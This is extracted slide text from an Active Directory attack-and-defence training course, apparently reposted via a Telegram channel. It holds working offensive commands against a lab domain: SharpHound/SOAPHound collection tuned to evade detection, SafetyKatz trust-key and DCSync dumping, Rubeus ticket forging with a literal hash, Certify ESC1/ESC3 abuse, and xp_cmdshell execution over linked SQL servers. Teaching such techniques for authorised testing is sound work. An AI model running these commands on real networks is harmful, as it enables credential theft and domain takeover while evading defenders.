Domain Enumeration - BloodHound
• Provides GUI for AD entities and relationships for the data collected by
its ingestors.
• Uses Graph Theory for providing the capability of mapping shortest path
for interesting things like Domain Admins.
• There are built-in queries for frequently used actions.
• Also supports custom Cypher queries.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 79
Edition Bootcamp

Join https://t.me/offenciveSec 79
Domain Enumeration - BloodHound
• There are two free versions of BloodHound
1. BloodHound Legacy - https://github.com/BloodHoundAD/BloodHound
2. BloodHound CE (Community Edition) - https://github.com/SpecterOps/BloodHound

• BloodHound Legacy is present in the C:\AD\Tools directory of your student

VM.

• You can have Read-only access to to the prep-populated BloodHound CE -

https://crtpbloodhound-altsecdashboard.msappproxy.net/
Use the credentials for [email protected] from
the lab portal - https://adlab.enterprisesecurity.io/
Attacking and Defending Active Directory - Beginner's
AlteredSecurity 80
Edition Bootcamp

Join https://t.me/offenciveSec 80
Domain Enumeration - BloodHound Legacy
• Supply data to BloodHound:
C:\AD\Tools\Loader.exe -Path C:\AD\Tools\BloodHound-
master\BloodHound-master\Collectors\SharpHound.exe -args --
collectionmethods All

• The gathered data can be uploaded to the BloodHound Legacy

application

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 81
Edition Bootcamp

Join https://t.me/offenciveSec 81
Domain Enumeration - BloodHound CE
• Supply data to BloodHound:
C:\AD\Tools\Loader.exe -Path C:\AD\Tools\Sharphound\SharpHound.exe -
args --collectionmethods All

• The gathered data can be uploaded to the BloodHound CE.

• Remember that you have Read-only access to the share web UI in the
lab.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 82
Edition Bootcamp

Join https://t.me/offenciveSec 82
Domain Enumeration - BloodHound
• To make BloodHound collection stealthy, remove noisy collection
methods like RDP, DCOM, PSRemote and LocalAdmin.
• Use the -ExcludeDCsto avoid detection by MDI:

C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SharpHound\SharpHound.exe -

args --collectionmethods
Group,GPOLocalGroup,Session,Trusts,ACL,Container,ObjectProps,SPNTarg
ets,CertServices --excludedcs

• Remember to remove the 'CertServices' collection method when using BloodHound legacy collector.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 83
Edition Bootcamp

Join https://t.me/offenciveSec 83
Domain Enumeration - SOAPHound
• Use SOAPHound for even more stealth.
• It talks to Active Driectory Web Services (ADWS - Port 9389) in place of sending
LDAP queries - just like the AD Module.
– Almost no network-based detection (like MDI).
– It retrieves information about all objects (objectGuid=*) and then process them.
It means limited LDAP queries - less chance of endpoint detection.

• Build a cache that includes basic info about domain objects.

SOAPHound.exe --buildcache -c C:\AD\Tools\cache.txt
• Collect BloodHound compatible data
SOAPHound.exe -c C:\AD\Tools\cache.txt --bhdump -o C:\AD\Tools\bloodhound-output --nolaps

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 84
Edition Bootcamp

https://falconforce.nl/soaphound-tool-to-collect-active-directory-data-via-adws/
https://github.com/FalconForceTeam/SOAPHound

Join https://t.me/offenciveSec 84
Join https://t.me/offenciveSec 85
Reference: https://learn.microsoft.com/en-us/windows/win32/secauthz/access-
control-model

Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Reference: https://learn.microsoft.com/en-us/windows/win32/secauthz/dacls-and-
aces

Join https://t.me/offenciveSec
Active Directory Rights: https://learn.microsoft.com/en-
us/dotnet/api/system.directoryservices.activedirectoryrights?view=dotnet-plat-ext-
7.0
Extended Rights: https://learn.microsoft.com/en-us/previous-versions/tn-
archive/ff405676(v=msdn.10)

Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec 91
https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/group-
policy/group-policy-overview

Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec 110
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Privilege Escalation
• In an AD environment, there are multiple scenarios which lead to privilege
escalation. We had a look at the following
– Hunting for Local Admin access on other machines
– Hunting for high privilege domain accounts (like a Domain Administrator)
• Let's also look for Local Privilege Escalation.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 117
Edition Bootcamp

Join https://t.me/offenciveSec 117

Join https://t.me/offenciveSec 118
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Privilege Escalation - Feature Abuse
• What we have been doing up to now (and will keep doing further in the
class) is relying on features abuse.
• Features abuse are awesome as there are seldom patches for them and
they are not the focus of security teams!
• One of my favorite features abuse is targeting enterprise applications
which are not built keeping security in mind.
• On Windows, many enterprise applications need either Administrative
privileges or SYSTEM privileges making them a great avenue for privilege
escalation.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 121
Edition Bootcamp

Join https://t.me/offenciveSec 121

Privilege Escalation - Feature Abuse - Jenkins
• Let’s use an older version of Jenkins as an example of vulnerable
Enterprise application.
• Jenkins is a widely used Continuous Integration tool.
• There are many interesting aspects with Jenkins but for now we would
limit our discussion to the ability of running system commands on
Jenkins.
• There is a Jenkins server running on dcorp-ci (172.16.3.11) on port
8080.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 122
Edition Bootcamp

Join https://t.me/offenciveSec 122

http://www.labofapenetrationtester.com/2014/06/hacking-jenkins-servers.html

Join https://t.me/offenciveSec 123

See more at http://www.labofapenetrationtester.com/2014/08/script-execution-and-
privilege-esc-jenkins.html
http://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-
day-1.html

Join https://t.me/offenciveSec 124

https://msrc.microsoft.com/blog/2024/12/mitigating-ntlm-relay-attacks-by-default/
https://en.hackndo.com/ntlm-relay/

Join https://t.me/offenciveSec 125

Join https://t.me/offenciveSec 126
Join https://t.me/offenciveSec 127
https://www.synacktiv.com/publications/gpoddity-exploiting-active-directory-gpos-
through-ntlm-relaying-and-more
https://github.com/synacktiv/GPOddity

Join https://t.me/offenciveSec 128

Join https://t.me/offenciveSec 129
Join https://t.me/offenciveSec 130
Lateral Movement

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 131
Edition Bootcamp

Join https://t.me/offenciveSec 131

https://learn.microsoft.com/en-us/previous-versions/technet-
magazine/ff700227(v=msdn.10)
https://learn.microsoft.com/en-us/powershell/scripting/learn/ps101/08-powershell-
remoting?view=powershell-7.3

Join https://t.me/offenciveSec 132

Join https://t.me/offenciveSec
https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-
find-credentials-in-them
https://www.ired.team/offensive-security/credential-access-and-credential-dumping
https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-
find-credentials-in-them

Join https://t.me/offenciveSec
https://github.com/gentilkiwi/mimikatz
Unofficial mimikatz guide:
https://adsecurity.org/?p=2207

Join https://t.me/offenciveSec
https://github.com/GhostPack/SafetyKatz
https://github.com/SecureAuthCorp/impacket/

Join https://t.me/offenciveSec
Reference for logon types: https://www.alteredsecurity.com/post/fantastic-windows-
logon-types-and-where-to-find-credentials-in-them

Join https://t.me/offenciveSec
https://github.com/GhostPack/Rubeus/

Join https://t.me/offenciveSec 150

Join https://t.me/offenciveSec 151
Krbtgt hash could also be dumped from NTDS.di.

Join https://t.me/offenciveSec 152

Join https://t.me/offenciveSec 153
Join https://t.me/offenciveSec 154
Join https://t.me/offenciveSec 155
Join https://t.me/offenciveSec 156
Join https://t.me/offenciveSec 157
Join https://t.me/offenciveSec 158
Join https://t.me/offenciveSec
List of SPNs: https://adsecurity.org/?page_id=183

Join https://t.me/offenciveSec 160

Join https://t.me/offenciveSec 161
https://www.trustedsec.com/blog/a-diamond-in-the-ruff

Join https://t.me/offenciveSec 162

Join https://t.me/offenciveSec 163
https://www.trustedsec.com/blog/a-diamond-in-the-ruff

Join https://t.me/offenciveSec 164

Join https://t.me/offenciveSec 165
https://www.secureworks.com/research/skeleton-key-malware-analysis

Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
https://learn.microsoft.com/en-us/previous-versions/technet-
magazine/ee361593(v=msdn.10)
https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-
best-practices/appendix-c--protected-accounts-and-groups-in-active-directory
https://adsecurity.org/?p=1906
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-
adts/dd3d29f3-8e1e-4e8c-a210-9eaef3abd628

Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
https://www.ossir.org/paris/supports/2017/2017-04-11/2017-04-
11_Active_directory_v2.5.pdf

Join https://t.me/offenciveSec 194

https://github.com/samratashok/RACE
https://github.com/samratashok/nishang/tree/master/Backdoors
https://learn.microsoft.com/en-us/archive/blogs/wmi/scripting-wmi-namespace-
security-part-1-of-3

Join https://t.me/offenciveSec 195

Note: Ignore the 'I/O operation' error.
https://github.com/samratashok/nishang/tree/master/Backdoors

Join https://t.me/offenciveSec 196

https://github.com/HarmJ0y/DAMP
https://posts.specterops.io/remote-hash-extraction-on-demand-via-host-security-
descriptor-modification-2cf505ec5c40

Join https://t.me/offenciveSec 197

Join https://t.me/offenciveSec 198
https://www.redsiege.com/wp-content/uploads/2020/08/Kerberoastv4.pdf

Join https://t.me/offenciveSec 199

Join https://t.me/offenciveSec 200
Join https://t.me/offenciveSec
Request a ticket using .NET classes
Add-Type -AssemblyNAme System.IdentityModel
New-Object
System.IdentityModel.Tokens.KerberosRequestorSecurity
Token -ArgumentList "MSSQLSvc/dcorp-
mgmt.dollarcorp.moneycorp.local"

Invoke-Kerberoast from BC Empire (https://github.com/BC-SECURITY/Empire)

can be used as well for cracking with John or Hashcat.
. .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -Identity svcadmin

Join https://t.me/offenciveSec
https://github.com/jim3ma/crunch
https://github.com/r3nt0n/bopscrk
https://github.com/digininja/CeWL

Join https://t.me/offenciveSec
Join https://t.me/offenciveSec 204
https://harmj0y.medium.com/roasting-as-reps-e6179a65216b

Join https://t.me/offenciveSec 205

Join https://t.me/offenciveSec 206
Join https://t.me/offenciveSec 207
Join https://t.me/offenciveSec 208
Join https://t.me/offenciveSec 209
https://posts.specterops.io/a-three-year-retrospective-c8bfe93b398a

Join https://t.me/offenciveSec 210

Join https://t.me/offenciveSec 211
https://room362.com/post/2016/kerberoast-pt3/

Join https://t.me/offenciveSec 212

https://room362.com/post/2016/kerberoast-pt3/

Join https://t.me/offenciveSec 213

Join https://t.me/offenciveSec
https://labs.f-secure.com/archive/trust-years-to-earn-seconds-to-break/

Join https://t.me/offenciveSec
Join https://t.me/offenciveSec
http://www.labofapenetrationtester.com/2016/02/getting-domain-admin-with-
kerberos-unconstrained-delegation.html
https://adsecurity.org/?p=1667
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-
server-2012-R2-and-2012/dn466518(v=ws.11)

Join https://t.me/offenciveSec
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/3bff5864-
8135-400e-bdd9-33b552051d94

Join https://t.me/offenciveSec
https://labs.f-secure.com/archive/trust-years-to-earn-seconds-to-break/

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 241
Edition Bootcamp

Join https://t.me/offenciveSec 241

Priv Esc - Enterprise Admins
• sIDHistory is a user attribute designed for scenarios where a user is
moved from one domain to another. When a user's domain is changed,
they get a new SID and the old SID is added to sIDHistory.
• sIDHistory can be abused in two ways of escalating privileges within a
forest:
– krbtgt hash of the child
– Trust tickets

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 242
Edition Bootcamp

Join https://t.me/offenciveSec 242

Kerberos - Across Domain Trusts

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 243
Edition Bootcamp

Join https://t.me/offenciveSec 243

Priv Esc - Enterprise Admins - Trust Key Abuse

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 244
Edition Bootcamp

Join https://t.me/offenciveSec 244

Priv Esc - Child to Parent using Trust Tickets
• So, what is required to forge trust tickets is, obviously, the trust key.
Look for [In] trust key from child to parent on the DC.
SafetyKatz.exe "lsadump::trust /patch"
or
SafetyKatz.exe "lsadump::dcsync /user:dcorp\mcorp$"
or
SafetyKatz.exe "lsadump::lsa /patch"

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 245
Edition Bootcamp

https://adsecurity.org/?p=1588

Join https://t.me/offenciveSec 245

Priv Esc - Child to Parent using Trust Tickets - Rubeus
• Forge an inter-realm TGT using Rubeus
C:\AD\Tools\Rubeus.exe silver
/service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL
/rc4:17e8f4d3f4b46e95048a66a5dd890ee3 /sid:S-1-5-21-
719815819-3726368948-3917688648 /sids:S-1-5-21-
335606122-960912869-3279953914-519 /ldap
/user:Administrator /nowrap

• Use the forged ticket

C:\AD\Tools\Rubeus.exe asktgs /service:http/mcorp-
dc.MONEYCORP.LOCAL /dc:mcorp-dc.MONEYCORP.LOCAL /ptt
/ticket:<FORGED TICKET>
Attacking and Defending Active Directory - Beginner's
AlteredSecurity 246
Edition Bootcamp

Join https://t.me/offenciveSec 246

Join https://t.me/offenciveSec 247
Join https://t.me/offenciveSec 248
Priv Esc - Enterprise Admins - krbtgt Secret Abuse

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 249
Edition Bootcamp

Join https://t.me/offenciveSec 249

Join https://t.me/offenciveSec 250
https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-
8ae0f4304c1d

Join https://t.me/offenciveSec 251

Join https://t.me/offenciveSec 252
Join https://t.me/offenciveSec 253
Join https://t.me/offenciveSec 254
Kerberos - Across External Trusts

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 255
Edition Bootcamp

Join https://t.me/offenciveSec 255

Priv Esc - Across External Trust - Trust Key Abuse

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 256
Edition Bootcamp

Join https://t.me/offenciveSec 256

Priv Esc - Across Forest using
Trust Tickets
• We require the trust key for the inter-forest trust from the DC that has
the external trust:
SafetyKatz.exe -Command '"lsadump::trust /patch"'
or
SafetyKatz.exe -Command '"lsadump::lsa /patch"'

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 257
Edition Bootcamp

https://adsecurity.org/?p=1588

Join https://t.me/offenciveSec 257

Priv Esc - Across Forest using
Trust Tickets - Rubeus
• Forge an inter-realm TGT using Rubeus
C:\AD\Tools\Rubeus.exe silver
/service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL
/rc4:17e8f4d3f4b46e95048a66a5dd890ee3 /sid:S-1-5-21-
719815819-3726368948-3917688648 /sids:S-1-5-21-
335606122-960912869-3279953914-519 /ldap
/user:Administrator /nowrap

• Use the forged ticket

Join https://t.me/offenciveSec 258

Join https://t.me/offenciveSec 259
Priv Esc - Across domain trusts - AD CS
• Active Directory Certificate Services (AD CS) enables use of Public Key
Infrastructure (PKI) in active directory forest.
• AD CS helps in authenticating users and machines, encrypting and
signing documents, filesystem, emails and more.
• "AD CS is the Server Role that allows you to build a public key
infrastructure (PKI) and provide public key cryptography, digital
certificates, and digital signature capabilities for your organization."

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 260
Edition Bootcamp

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-
server-2012-r2-and-2012/hh831740(v=ws.11)
https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/active-directory-
certificate-services-overview

Join https://t.me/offenciveSec 260

Priv Esc - Across domain trusts - AD CS
• CA - The certification authority that issues certificates. The server with AD CS
role (DC or separate) is the CA.
• Certificate - Issued to a user or machine and can be used for authentication,
encryption, signing etc.
• CSR - Certificate Signing Request made by a client to the CA to request a
certificate.
• Certificate Template - Defines settings for a certificate. Contains information
like - enrolment permissions, EKUs, expiry etc.
• EKU OIDs - Extended Key Usages Object Identifiers. These dictate the use of a
certificate template (Client authentication, Smart Card Logon, SubCA etc.)

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 261
Edition Bootcamp

Join https://t.me/offenciveSec 261

Priv Esc - Across domain trusts - AD CS

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 262
Edition Bootcamp

Diagram source - https://www.specterops.io/assets/resources/Certified_Pre-

Owned.pdf

Join https://t.me/offenciveSec 262

Priv Esc - Across domain trusts - AD CS
• There are various ways of abusing ADCS! (See the link to "Certified Pre-
Owned" paper in slide notes):
– Extract user and machine certificates
– Use certificates to retrieve NTLM hash
– User and machine level persistence
– Escalation to Domain Admin and Enterprise Admin
– Domain persistence
• We will not discuss all of the techniques!

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 263
Edition Bootcamp

See page 4 and 5 for summary of attack techniques -

https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf

Join https://t.me/offenciveSec 263

Priv Esc - Across domain trusts - AD CS

Stealing THEFT1 THEFT2 THEFT3 THEFT4 THEFT5

Certificates
Export certs with Extracting user Extracting Steal certificates Use Kerberos
private keys using certs with private machine certs from files and PKINIT to get
Windows' crypto keys using DPAPI with private keys stores NTLM hash
APIs using DPAPI
Persistence PERSIST1 PERSIST2 PERSIST3

User persistence Machine User/Machine

by requesting persistence by persistence by
new certs requesting new renewing certs
certs

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 264
Edition Bootcamp

Join https://t.me/offenciveSec 264

Priv Esc - Across domain trusts - AD CS
ESC1 ESC2 ESC3 ESC4 ESC5 ESC6 (Patched ESC7 ESC8
- May'22)
Enrolee can Any purpose or Request an Overly Poor access Poor access NTLM relay
request cert for no EKU enrollment permissive control on CA EDITF_ATTRIBU control on roles to HTTP
ANY user (potentially agent ACLs on server, CA TESUBJECTALT on CA authority enrollment
dangerous) certificate and templates server NAME2 setting like "CA endpoints
use it to computer on CA - Administrator"
request cert on object etc. Request certs and "Certificate
behalf of ANY for ANY user Manager"
user
ESC9 ESC10 ESC11 ESC12 ESC13 ESC14 (To be ESC15 (Patched
patched) Nov'24)
No Security Implicit Weak NTLM relay to Steal CA Enrolee gets
Extension (Enrolee Certificate RPC enrolment private key privileges of Auth as the EKUwu - Abuse of
can modify own Mapping endpoints from Yubico the linked target using default version 1
UPN to request (Enrolee can . YubiHSM Group certificate of templates to
cert on behalf of modify own referenced in 'override' EKUs
ANY user) UPN to request altSecurityIden
cert on behalf tities attribute
of ANY user) Attacking and Defending Active Directory - Beginner's of the target
AlteredSecurity 265
Edition Bootcamp

Join https://t.me/offenciveSec 265

Priv Esc - Across domain trusts - AD CS
Domain DPERSIST1 DPERSIST2 DPERSIST3
Persistence
Forge Malicious Backdoor
certificates root/interm CA Server,
with stolen ediate CAs CA server
CA private computer
keys object etc.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 266
Edition Bootcamp

Join https://t.me/offenciveSec 266

Priv Esc - Across domain trusts - AD CS
• We can use the Certify tool (https://github.com/GhostPack/Certify) to
enumerate (and for other attacks) AD CS in the target forest:
Certify.exe cas

• Enumerate the templates.:

Certify.exe find

• Enumerate vulnerable templates:

Certify.exe find /vulnerable

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 267
Edition Bootcamp

Join https://t.me/offenciveSec 267

Priv Esc - Across domain trusts - AD CS
• In moneycorp, there are multiple misconfigurations in AD CS.
• Common requirements/misconfigurations for all the Escalations that we
have in the lab (ESC1 and ESC3)
– CA grants normal/low-privileged users enrollment rights
– Manager approval is disabled
– Authorization signatures are not required
– The target template grants normal/low-privileged users enrollment
rights

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 268
Edition Bootcamp

Join https://t.me/offenciveSec 268

Priv Esc - Across domain trusts - AD CS - ESC3
• The template "SmartCardEnrollment-Agent" allows Domain users to
enroll and has "Certificate Request Agent" EKU.
Certify.exe find /vulnerable

• The template "SmartCardEnrollment-Users" has an Application Policy

Issuance Requirement of Certificate Request Agent and has an EKU that
allows for domain authentication.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 269
Edition Bootcamp

Join https://t.me/offenciveSec 269

Priv Esc - Across domain trusts - AD CS - ESC3
Escalation to DA
• We can now request a certificate for Certificate Request Agent from "SmartCardEnrollment-
Agent" template.
Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
/template:SmartCardEnrollment-Agent

• Convert from cert.pem to pfx (esc3agent.pfx below) and use it to request a certificate on
behalf of DA using the "SmartCardEnrollment-Users" template.
Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
/template:SmartCardEnrollment-Users /onbehalfof:dcorp\administrator
/enrollcert:esc3agent.pfx /enrollcertpw:SecretPass@123

• Convert from cert.pem to pfx (esc3user-DA.pfx below), request DA TGT and inject it:
Rubeus.exe asktgt /user:administrator /certificate:esc3user-DA.pfx
/password:SecretPass@123 /ptt

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 270
Edition Bootcamp

Join https://t.me/offenciveSec 270

Priv Esc - Across domain trusts - AD CS - ESC3
Escalation to EA
• Convert from cert.pem to pfx (esc3agent.pfx below) and use it to request a
certificate on behalf of EA using the "SmartCardEnrollment-Users" template.
Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-
MCORP-DC-CA /template:SmartCardEnrollment-Users
/onbehalfof:moneycorp.local\administrator
/enrollcert:esc3agent.pfx /enrollcertpw:SecretPass@123

• Request EA TGT and inject it:

Rubeus.exe asktgt /user:moneycorp.local\administrator
/certificate:esc3user.pfx /dc:mcorp-dc.moneycorp.local
/password:SecretPass@123 /ptt

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 271
Edition Bootcamp

Join https://t.me/offenciveSec 271

Priv Esc - Across domain trusts - AD CS - ESC1
• The template "HTTPSCertificates" has ENROLLEE_SUPPLIES_SUBJECT value for
msPKI-Certificates-Name-Flag.
Certify.exe find /enrolleeSuppliesSubject

• The template "HTTPSCertificates" allows enrollment to the RDPUsers group. Request

a certificate for DA (or EA) as studentx
Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-
CA /template:"HTTPSCertificates" /altname:administrator

• Convert from cert.pem to pfx (esc1.pfx below) and use it to request a TGT for DA (or
EA).
Rubeus.exe asktgt /user:administrator /certificate:esc1.pfx
/password:SecretPass@123 /ptt

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 272
Edition Bootcamp

Join https://t.me/offenciveSec 272

Join https://t.me/offenciveSec 273
Join https://t.me/offenciveSec 274
Join https://t.me/offenciveSec 275
Trust Abuse - MSSQL Servers - Database Links
• A database link allows a SQL Server to access external data sources like
other SQL Servers and OLE DB data sources.
• In case of database links between SQL servers, that is, linked SQL servers
it is possible to execute stored procedures.
• Database links work even across forest trusts.

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 276
Edition Bootcamp

More at: https://learn.microsoft.com/en-us/sql/relational-databases/linked-

servers/linked-servers-database-engine?view=sql-server-ver16

Join https://t.me/offenciveSec 276

Trust Abuse - MSSQL Servers - Database Links
Searching Database Links
• Look for links to remote servers
Get-SQLServerLink -Instance dcorp-mssql -Verbose

select * from master..sysservers

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 277
Edition Bootcamp

Join https://t.me/offenciveSec 277

Trust Abuse - MSSQL Servers - Database Links
Enumerating Database Links - Manually
• Openquery() function can be used to run queries on a linked database
select * from openquery("dcorp-sql1",'select * from master..sysservers')

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 278
Edition Bootcamp

Join https://t.me/offenciveSec 278

Trust Abuse - MSSQL Servers - Database Links
Enumerating Database Links
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose
or
• Openquery queries can be chained to access links within links (nested
links)
select * from openquery("dcorp-sql1",'select * from openquery("dcorp-
mgmt",''select * from master..sysservers'')')

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 279
Edition Bootcamp

Join https://t.me/offenciveSec 279

Trust Abuse - MSSQL Servers - Database Links
Executing Commands
• On the target server, either xp_cmdshell should be already enabled; or
• If rpcout is enabled (disabled by default), xp_cmdshell can be enabled
using:
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "eu-sql"

Attacking and Defending Active Directory - Beginner's

AlteredSecurity 280
Edition Bootcamp

Join https://t.me/offenciveSec 280

Trust Abuse - MSSQL Servers - Database Links
Executing Commands
• Use the -QuertyTarget parameter to run Query on a specific instance
(without -QueryTarget the command tries to use xp_cmdshell on every link of
the chain)
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec
master..xp_cmdshell 'whoami'" -QueryTarget eu-sql

• From the initial SQL server, OS commands can be executed using nested link
queries:
select * from openquery("dcorp-sql1",'select * from openquery("dcorp-
mgmt",''select * from openquery("eu-sql.eu.eurocorp.local",''''select
